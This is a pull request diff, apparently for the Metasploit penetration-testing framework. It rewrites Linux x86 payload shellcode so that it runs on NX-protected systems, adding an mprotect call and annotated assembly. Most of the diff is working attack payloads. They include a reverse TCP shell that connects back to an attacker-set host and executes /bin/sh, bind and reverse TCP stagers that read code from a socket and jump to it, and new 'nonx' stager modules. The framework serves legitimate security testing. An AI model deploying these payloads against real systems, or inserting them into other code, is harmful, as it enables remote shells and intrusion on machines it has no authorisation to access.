### PR TITLE
Update linux stagers for NX compatibility

### DIFF
--- a/external/source/shellcode/linux/ia32/Makefile
+++ b/external/source/shellcode/linux/ia32/Makefile
@@ -1,4 +1,4 @@
-STAGERS=stager_sock_bind stager_sock_bind_udp stager_sock_bind_icmp \
+STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
         stager_egghunt stager_sock_find stager_sock_reverse \
         stager_sock_reverse_icmp stager_sock_reverse_udp \
 				stager_sock_reverse_udp_dns
@@ -30,8 +30,22 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
 		sed -e 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' \
 		-e 's/^/"/;s/$$/"/;$$ b;s/$$/+/;' > $@
 
+# ljust(23) because the longest instruction is usually 5 bytes which takes 22
+# characters including quotes
 %.disasm: %.bin
-	@ndisasm -b 32 $< > $@
+	@ndisasm -b 32 $< > $*.tmp
+	@ruby -p -a -e ' \
+		$$F.shift; \
+		$$F[0].tap { |s| \
+			s.tr! "A-F", "a-f"; \
+			t=s.dup; \
+			s.clear; \
+			s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
+			STDIN.eof? ? s<< " #  " : s<< "+#  "; \
+		}; \
+		$$_ = $$F.join(" ") + "\n"; \
+		' < $*.tmp > $@
+	@rm $*.tmp
 
 $(SINGLE) $(STAGES) $(STAGERS): %: %.o
 	@echo "Building $@... (`wc -c $(<:.o=.bin)|awk '{print $$1}'` bytes)"

--- a/external/source/shellcode/linux/ia32/stager_sock_reverse.asm
+++ b/external/source/shellcode/linux/ia32/stager_sock_reverse.asm
@@ -26,48 +26,62 @@
 ; meta-connection-type=reverse
 ; meta-name=reverse_tcp
 ; meta-basemod=Msf::PayloadComponent::ReverseConnection
-; meta-offset-lhost=0x11
-; meta-offset-lport=0x17
+; meta-offset-lhost=0x12
+; meta-offset-lport=0x19
 ;;
 BITS   32
 GLOBAL _start
 
 _start:
 	xor  ebx, ebx
+	mul  ebx
 
+; int socket(int domain, int type, int protocol);
 socket:
-	push ebx
-	inc  ebx
-	push ebx
-	push byte 0x2
-	push byte 0x66
-	pop  eax
-	mov  ecx, esp
+	push ebx              ; protocol = 0 = first that matches this type and domain, i.e. tcp
+	inc  ebx              ; 1 = SYS_SOCKET
+	push ebx              ; type     = 1 = SOCK_STREAM
+	push byte 0x2         ; domain   = 2 = AF_INET
+	mov  al, 0x66         ; __NR_socketcall
+	mov  ecx, esp         ; socketcall args
 	int  0x80
 	xchg eax, edi
 
+; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
 connect:
 	pop  ebx
-	push dword 0x0100007f ; ip: 127.0.0.1
-	push word 0xbfbf      ; port: 49087
-	push bx
-	mov  ecx, esp
-	push byte 0x66
+	push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
+	push 0xbfbf0002       ; addr->sin_port = 49087
+	                      ; addr->sin_family = 2 = AF_INET
+	mov  ecx, esp         ; ecx = addr
+	push byte 0x66        ; __NR_socketcall
 	pop  eax
-	push eax
-	push ecx
-	push edi
-	mov  ecx, esp
-	inc  ebx
+	push eax              ; addrlen
+	push ecx              ; addr
+	push edi              ; sockfd
+	mov  ecx, esp         ; socketcall args
+	inc  ebx              ; 3 = SYS_CONNECT
 	int  0x80
 
 %ifndef USE_SINGLE_STAGE
 
+; int mprotect(const void *addr, size_t len, int prot);
+mprotect:
+	mov  dl, 0x7          ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
+	mov  ecx, 0x1000      ; len  = PAGE_SIZE (on most systems)
+	mov  ebx, esp         ; addr
+	shr  ebx, 12          ; ensure that addr is page-aligned
+	shl  ebx, 12
+	mov  al, 0x7d         ; __NR_mprotect
+	int  0x80
+
+; ssize_t read(int fd, void *buf, size_t count);
 recv:
-	pop  ebx
+	pop  ebx              ; sockfd
+	mov  ecx, esp         ; buf
 	cdq
-	mov  dh, 0xc
-	mov  al, 0x3
+	mov  dh, 0xc          ; count = 0xc00
+	mov  al, 0x3          ; __NR_read
 	int  0x80
 	jmp  ecx
 

--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
@@ -35,47 +35,44 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							'LHOST'    => [ 18, 'ADDR' ],
-							'LPORT'    => [ 24, 'n'    ],
+							'LHOST'    => [ 25, 'ADDR' ],
+							'LPORT'    => [ 32, 'n'    ],
 						},
 					'Payload' =>
-						"\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-						"\xf7\xe3"             +#   mull    %ebx                       #
-						"\x53"                 +#   pushl   %ebx                       #
-						"\x43"                 +#   incl    %ebx                       #
-						"\x53"                 +#   pushl   %ebx                       #
-						"\x6a\x02"             +#   pushl   $0x02                      #
-						"\x89\xe1"             +#   movl    %esp,%ecx                  #
-						"\xb0\x66"             +#   movb    $0x66,%al                  #
-						"\xcd\x80"             +#   int     $0x80                      #
-						"\x5b"                 +#   popl    %ebx                       #
-						"\x5e"                 +#   popl    %esi                       #
-						"\x68\x7f\x00\x00\x01" +#   pushl   $0x0100007f                #
-						"\x66\x68\x04\xd2"     +#   pushw   $0xd204                    #
-						"\x66\x53"             +#   pushw   %bx                        #
-						"\x6a\x10"             +#   pushl   $0x10                      #
-						"\x51"                 +#   pushl   %ecx                       #
-						"\x50"                 +#   pushl   %eax                       #
-						"\x89\xe1"             +#   movl    %esp,%ecx                  #
-						"\x43"                 +#   incl    %ebx                       #
-						"\x6a\x66"             +#   pushl   $0x66                      #
-						"\x58"                 +#   popl    %eax                       #
-						"\xcd\x80"             +#   int     $0x80                      #
-						"\x59"                 +#   popl    %ecx                       #
-						"\x87\xd9"             +#   xchgl   %ebx,%ecx                  #
-						"\xb0\x3f"             +#   movb    $0x3f,%al                  #
-						"\xcd\x80"             +#   int     $0x80                      #
-						"\x49"                 +#   decl    %ecx                       #
-						"\x79\xf9"             +#   jns     <cntsockcode+43>           #
-						"\x50"                 +#   pushl   %eax                       #
-						"\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-						"\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-						"\x89\xe3"             +#   movl    %esp,%ebx                  #
-						"\x50"                 +#   pushl   %eax                       #
-						"\x53"                 +#   pushl   %ebx                       #
-						"\x89\xe1"             +#   movl    %esp,%ecx                  #
-						"\xb0\x0b"             +#   movb    $0x0b,%al                  #
-						"\xcd\x80"              #   int     $0x80                      #
+						"\x31\xdb"             +#   xor ebx,ebx
+						"\xf7\xe3"             +#   mul ebx
+						"\x53"                 +#   push ebx
+						"\x43"                 +#   inc ebx
+						"\x53"                 +#   push ebx
+						"\x6a\x02"             +#   push byte +0x2
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xb0\x66"             +#   mov al,0x66
+						"\xcd\x80"             +#   int 0x80
+						"\x93"                 +#   xchg eax,ebx
+						"\x59"                 +#   pop ecx
+						"\xb0\x3f"             +#   mov al,0x3f
+						"\xcd\x80"             +#   int 0x80
+						"\x49"                 +#   dec ecx
+						"\x79\xf9"             +#   jns 0x11
+						"\x68\x7f\x00\x00\x01" +#   push dword 0x100007f
+						"\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xb0\x66"             +#   mov al,0x66
+						"\x50"                 +#   push eax
+						"\x51"                 +#   push ecx
+						"\x53"                 +#   push ebx
+						"\xb3\x03"             +#   mov bl,0x3
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xcd\x80"             +#   int 0x80
+						"\x52"                 +#   push edx
+						"\x68\x2f\x2f\x73\x68" +#   push dword 0x68732f2f
+						"\x68\x2f\x62\x69\x6e" +#   push dword 0x6e69622f
+						"\x89\xe3"             +#   mov ebx,esp
+						"\x52"                 +#   push edx
+						"\x53"                 +#   push ebx
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xb0\x0b"             +#   mov al,0xb
+						"\xcd\x80"              #   int 0x80
 				}
 			))
 	end

--- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb
@@ -27,7 +27,10 @@ module Metasploit3
 			'Name'        => 'Bind TCP Stager (IPv6)',
 			'Version'     => '$Revision$',
 			'Description' => 'Listen for a connection over IPv6',
-			'Author'      => 'kris katterjohn',
+			'Author'      => [
+					'kris katterjohn', # original
+					'egypt',           # NX support
+				],
 			'License'     => MSF_LICENSE,
 			'Platform'    => 'linux',
 			'Arch'        => ARCH_X86,
@@ -35,11 +38,54 @@ module Metasploit3
 			'Stager'      => {
 					'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
 					'Payload' =>
-						"\x31\xdb\x53\x43\x53\x6a\x0a\x89\xe1\x6a\x66\x58\xcd\x80\x96" +
-						"\x99\x52\x52\x52\x52\x52\x52\x66\x68\xbf\xbf\x66\x68\x0a\x00" +
-						"\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\xb0" +
-						"\x66\xb3\x04\xcd\x80\x52\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80" +
-						"\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+
+						"\x6a\x7d"             +#   push byte +0x7d
+						"\x58"                 +#   pop eax
+						"\x99"                 +#   cdq
+						"\xb2\x07"             +#   mov dl,0x7
+						"\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
+						"\x89\xe3"             +#   mov ebx,esp
+						"\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
+						"\xcd\x80"             +#   int 0x80
+						"\x31\xdb"             +#   xor ebx,ebx
+						"\xf7\xe3"             +#   mul ebx
+						"\x53"                 +#   push ebx
+						"\x43"                 +#   inc ebx
+						"\x53"                 +#   push ebx
+						"\x6a\x0a"             +#   push byte +0xa
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xb0\x66"             +#   mov al,0x66
+						"\xcd\x80"             +#   int 0x80
+						"\x43"                 +#   inc ebx
+						"\x52"                 +#   push edx
+						"\x52"                 +#   push edx
+						"\x52"                 +#   push edx
+						"\x52"                 +#   push edx
+						"\x52"                 +#   push edx
+						"\x52"                 +#   push edx
+						"\x68\x0a\x00\xbf\xbf" +#   push dword 0xbfbf000a
+						"\x89\xe1"             +#   mov ecx,esp
+						"\x6a\x1c"             +#   push byte +0x1c
+						"\x51"                 +#   push ecx
+						"\x50"                 +#   push eax
+						"\x89\xe1"             +#   mov ecx,esp
+						"\x6a\x66"             +#   push byte +0x66
+						"\x58"                 +#   pop eax
+						"\xcd\x80"             +#   int 0x80
+						"\xd1\xe3"             +#   shl ebx,1
+						"\xb0\x66"             +#   mov al,0x66
+						"\xcd\x80"             +#   int 0x80
+						"\x43"                 +#   inc ebx
+						"\xb0\x66"             +#   mov al,0x66
+						"\x89\x51\x04"         +#   mov [ecx+0x4],edx
+						"\xcd\x80"             +#   int 0x80
+						"\x93"                 +#   xchg eax,ebx
+						"\xb6\x0c"             +#   mov dh,0xc
+						"\xb0\x03"             +#   mov al,0x3
+						"\xcd\x80"             +#   int 0x80
+						"\x89\xdf"             +#   mov edi,ebx
+						"\xff\xe1"              #   jmp ecx
+
 				}
 			))
 	end

--- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb
@@ -1,0 +1,59 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def self.handler_type_alias
+		"bind_nonx_tcp"
+	end
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection',
+			'Author'        => 'skape',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 0x14, 'n'    ],
+						},
+					'Payload' =>
+						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+						"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+						"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+						"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+				}
+			))
+	end
+
+end

--- a/modules/payloads/stagers/linux/x86/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb
@@ -32,7 +32,10 @@ module Metasploit3
 			'Name'          => 'Bind TCP Stager',
 			'Version'       => '$Revision$',
 			'Description'   => 'Listen for a connection',
-			'Author'        => 'skape',
+			'Author'        => [
+					'skape',  # original
+					'egypt',  # NX support
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
 			'Arch'          => ARCH_X86,
@@ -41,13 +44,52 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							'LPORT' => [ 0x14, 'n'    ],
+							'LPORT' => [ 0x29, 'n'    ],
 						},
 					'Payload' =>
-						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
-						"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
-						"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
-						"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+
+							"\x6a\x7d"             +#   push byte +0x7d
+							"\x58"                 +#   pop eax
+							"\x99"                 +#   cdq
+							"\xb2\x07"             +#   mov dl,0x7
+							"\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
+							"\x89\xe3"             +#   mov ebx,esp
+							"\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
+							"\xcd\x80"             +#   int 0x80
+							"\x31\xdb"             +#   xor ebx,ebx
+							"\xf7\xe3"             +#   mul ebx
+							"\x53"                 +#   push ebx
+							"\x43"                 +#   inc ebx
+							"\x53"                 +#   push ebx
+							"\x6a\x02"             +#   push byte +0x2
+							"\x89\xe1"             +#   mov ecx,esp
+							"\xb0\x66"             +#   mov al,0x66
+							"\xcd\x80"             +#   int 0x80
+							"\x5b"                 +#   pop ebx
+							"\x5e"                 +#   pop esi
+							"\x52"                 +#   push edx
+							"\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
+							"\x6a\x10"             +#   push byte +0x10
+							"\x51"                 +#   push ecx
+							"\x50"                 +#   push eax
+							"\x89\xe1"             +#   mov ecx,esp
+							"\x6a\x66"             +#   push byte +0x66
+							"\x58"                 +#   pop eax
+							"\xcd\x80"             +#   int 0x80
+							"\xd1\xe3"             +#   shl ebx,1
+							"\xb0\x66"             +#   mov al,0x66
+							"\xcd\x80"             +#   int 0x80
+							"\x43"                 +#   inc ebx
+							"\xb0\x66"             +#   mov al,0x66
+							"\x89\x51\x04"         +#   mov [ecx+0x4],edx
+							"\xcd\x80"             +#   int 0x80
+							"\x93"                 +#   xchg eax,ebx
+							"\xb6\x0c"             +#   mov dh,0xc
+							"\xb0\x03"             +#   mov al,0x3
+							"\xcd\x80"             +#   int 0x80
+							"\x89\xdf"             +#   mov edi,ebx
+							"\xff\xe1"              #   jmp ecx
+
 				}
 			))
 	end

--- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb
@@ -1,0 +1,60 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+###
+#
+# ReverseTcp
+# ----------
+#
+# Linux reverse TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def self.handler_type_alias
+		"reverse_nonx_tcp"
+	end
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Reverse TCP Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to the attacker',
+			'Author'        => 'skape',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LHOST' => [ 0x11, 'ADDR' ],
+							'LPORT' => [ 0x17, 'n'    ],
+						},
+					'Payload' =>
+						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b" +
+						"\x68\x7f\x00\x00\x01\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58" +
+						"\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80" +
+						"\xff\xe1"
+				}
+			))
+	end
+
+end

--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -32,7 +32,10 @@ module Metasploit3
 			'Name'          => 'Reverse TCP Stager',
 			'Version'       => '$Revision$',
 			'Description'   => 'Connect back to the attacker',
-			'Author'        => 'skape',
+			'Author'        => [
+					'skape',  # original
+					'egypt',  # NX support
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
 			'Arch'          => ARCH_X86,
@@ -41,14 +44,48 @@ module Metasploit3
 				{
 					'Offsets' =>
 						{
-							'LHOST' => [ 0x11, 'ADDR' ],
-							'LPORT' => [ 0x17, 'n'    ],
+							'LHOST' => [ 0x12, 'ADDR' ],
+							'LPORT' => [ 0x19, 'n'    ],
 						},
 					'Payload' =>
-						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x97\x5b" +
-						"\x68\x7f\x00\x00\x01\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58" +
-						"\x50\x51\x57\x89\xe1\x43\xcd\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80" +
-						"\xff\xe1"
+
+						"\x31\xdb"             +#   xor ebx,ebx
+						"\xf7\xe3"             +#   mul ebx
+						"\x53"                 +#   push ebx
+						"\x43"                 +#   inc ebx
+						"\x53"                 +#   push ebx
+						"\x6a\x02"             +#   push byte +0x2
+						"\xb0\x66"             +#   mov al,0x66
+						"\x89\xe1"             +#   mov ecx,esp
+						"\xcd\x80"             +#   int 0x80
+						"\x97"                 +#   xchg eax,edi
+						"\x5b"                 +#   pop ebx
+						"\x68\x7f\x00\x00\x01" +#   push dword 0x100007f
+						"\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
+						"\x89\xe1"             +#   mov ecx,esp
+						"\x6a\x66"             +#   push byte +0x66
+						"\x58"                 +#   pop eax
+						"\x50"                 +#   push eax
+						"\x51"                 +#   push ecx
+						"\x57"                 +#   push edi
+						"\x89\xe1"             +#   mov ecx,esp
+						"\x43"                 +#   inc ebx
+						"\xcd\x80"             +#   int 0x80
+						"\xb2\x07"             +#   mov dl,0x7
+						"\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
+						"\x89\xe3"             +#   mov ebx,esp
+						"\xc1\xeb\x0c"         +#   shr ebx,0xc
+						"\xc1\xe3\x0c"         +#   shl ebx,0xc
+						"\xb0\x7d"             +#   mov al,0x7d
+						"\xcd\x80"             +#   int 0x80
+						"\x5b"                 +#   pop ebx
+						"\x89\xe1"             +#   mov ecx,esp
+						"\x99"                 +#   cdq
+						"\xb6\x0c"             +#   mov dh,0xc
+						"\xb0\x03"             +#   mov al,0x3
+						"\xcd\x80"             +#   int 0x80
+						"\xff\xe1"              #   jmp ecx
+
 				}
 			))
 	end

--- a/tools/module_payloads.rb
+++ b/tools/module_payloads.rb
@@ -1,0 +1,35 @@
+#!/usr/bin/env ruby
+#
+# $Id$
+#
+# This script lists each exploit module by its compatible payloads
+#
+# $Revision$
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+	msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+
+$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', 'lib')))
+require 'fastlib'
+require 'msfenv'
+
+$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
+
+require 'rex'
+require 'msf/ui'
+require 'msf/base'
+
+# Initialize the simplified framework instance.
+$framework = Msf::Simple::Framework.create('DisableDatabase' => true)
+
+$framework.exploits.each_module { |name, mod|
+	x = mod.new
+
+	x.compatible_payloads.map{|n, m|
+		puts "#{x.refname.ljust 40} - #{n}"
+	}
+}
+


### PR DESCRIPTION
- Adds a call to mprotect(2) to the reverse and bind stagers
- Adds accurate source for some other linux shellcode, including some
  comments to make it more maintainable
- Adds tools/module_payload.rb for listing all payloads for each exploit
  in a greppable format. Makes it easy to find out if a payload change
  causes a payload to no longer be compatible with a given exploit.
- Missing from this commit is source for reverse_ipv6_tcp
